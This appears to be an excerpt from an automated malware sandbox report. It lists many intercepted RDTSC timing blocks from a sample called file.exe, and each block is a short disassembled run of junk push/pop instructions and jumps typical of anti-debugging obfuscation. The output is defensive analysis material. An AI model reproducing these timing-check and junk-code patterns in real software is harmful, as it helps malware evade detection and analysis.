                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6532 second address: 12F657C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0C920D2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F8ED0C920D1h 0x00000014 pushad 0x00000015 popad 0x00000016 jno 00007F8ED0C920C6h 0x0000001c popad 0x0000001d pushad 0x0000001e jg 00007F8ED0C920C6h 0x00000024 push edi 0x00000025 pop edi 0x00000026 jnp 00007F8ED0C920C6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5159 second address: 12F517B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8ED0E3C3E2h 0x0000000d jl 00007F8ED0E3C3E2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F517B second address: 12F5181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58B8 second address: 12F58BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58BE second address: 12F58C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58C4 second address: 12F58C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58C8 second address: 12F58DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F58DF second address: 12F58FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8ED0E3C3E0h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C2C second address: 12F5C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C30 second address: 12F5C3D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C3D second address: 12F5C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5C44 second address: 12F5C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F8ED0E3C3E5h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5F45 second address: 12F5F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007F8ED0C920CDh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F8ED0C920C6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE800 second address: 12BE809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE809 second address: 12BE84D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F8ED0C920D1h 0x00000010 nop 0x00000011 mov ecx, dword ptr [ebp+122D3747h] 0x00000017 lea eax, dword ptr [ebp+12494569h] 0x0000001d mov di, 2F53h 0x00000021 nop 0x00000022 jng 00007F8ED0C920DEh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE84D second address: 1297E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0E3C3E0h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8ED0E3C3DCh 0x00000014 popad 0x00000015 jp 00007F8ED0E3C3D8h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e nop 0x0000001f mov edx, esi 0x00000021 push ecx 0x00000022 pushad 0x00000023 mov ah, bh 0x00000025 cld 0x00000026 popad 0x00000027 pop edi 0x00000028 call dword ptr [ebp+122D2793h] 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 popad 0x00000034 jbe 00007F8ED0E3C3D6h 0x0000003a jbe 00007F8ED0E3C3D6h 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 pop eax 0x00000045 jmp 00007F8ED0E3C3DEh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE943 second address: 12BE954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEF90 second address: 12BEF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEF94 second address: 12BEFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF08D second address: 12BF09E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F8ED0E3C3D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF09E second address: 12BF0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F8ED0C920C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0AC second address: 12BF0BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0BC second address: 12BF0C9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF71B second address: 12BF71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF71F second address: 12BF73A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF73A second address: 12BF73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF73E second address: 12BF775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov cx, DA5Ah 0x0000000f push 0000001Eh 0x00000011 jo 00007F8ED0C920CCh 0x00000017 mov dword ptr [ebp+122D1D59h], edx 0x0000001d nop 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFB1F second address: 12BFB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFB23 second address: 12BFB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12989EA second address: 12989F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12989F0 second address: 12989F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA5A2 second address: 12FA5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA723 second address: 12FA749 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8ED0C920C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8ED0C920D5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA749 second address: 12FA74F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA74F second address: 12FA76D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA76D second address: 12FA773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA8CE second address: 12FA8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA8D9 second address: 12FA8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA3D second address: 12FAA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA43 second address: 12FAA57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8ED0E3C3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F8ED0E3C3D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFB23 second address: 12FFB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFB27 second address: 12FFB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFCAC second address: 12FFCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300771 second address: 1300775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300E61 second address: 1300E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679A5 second address: 12679A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679A9 second address: 12679B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679B4 second address: 12679BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679BA second address: 12679C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130721C second address: 1307222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309C11 second address: 1309C23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8ED0C920CCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309C23 second address: 1309C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8ED0E3C3E4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13098FE second address: 130990A instructions: 0x00000000 rdtsc 0x00000002 js 00007F8ED0C920C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BC7A second address: 127BCA6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8ED0E3C3D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F8ED0E3C3D8h 0x00000012 push edi 0x00000013 jmp 00007F8ED0E3C3E4h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EA9A second address: 130EAA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EAA2 second address: 130EAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EAA8 second address: 130EAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8ED0C920C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EAB2 second address: 130EAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F8ED0E3C3DCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E7B9 second address: 130E7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313353 second address: 131336B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131336B second address: 1313389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F8ED0C920E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F8ED0C920C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13134A3 second address: 13134CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F8ED0E3C3D6h 0x0000000e popad 0x0000000f jmp 00007F8ED0E3C3E4h 0x00000014 jl 00007F8ED0E3C3DCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313659 second address: 131365F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131365F second address: 1313665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313665 second address: 1313675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F8ED0C920DAh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313956 second address: 131395A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131395A second address: 1313989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 jmp 00007F8ED0C920CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313989 second address: 131398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131398F second address: 131399B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007F8ED0C920C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317F87 second address: 1317F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317F8D second address: 1317F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317F93 second address: 1317F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131810F second address: 1318113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318113 second address: 131812B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131812B second address: 1318156 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F8ED0C920D7h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8ED0C920CAh 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13182A3 second address: 13182A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318561 second address: 13185BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F8ED0C920D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8ED0C920D7h 0x00000016 jmp 00007F8ED0C920CFh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131875A second address: 1318775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E854 second address: 131E863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8ED0C920C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E9DB second address: 131E9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131EB3E second address: 131EB48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8ED0C920E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131EE7A second address: 131EE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131EE7E second address: 131EE87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320537 second address: 1320542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320542 second address: 1320546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320546 second address: 132054C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132054C second address: 1320558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007F8ED0C920C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325FF0 second address: 1325FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A322 second address: 132A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F8ED0C920C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A330 second address: 132A339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A339 second address: 132A33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A33D second address: 132A34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8ED0E3C3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A34F second address: 132A353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329436 second address: 1329453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8ED0E3C3E0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329453 second address: 132946B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8ED0C920C6h 0x00000008 jl 00007F8ED0C920C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132946B second address: 132946F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
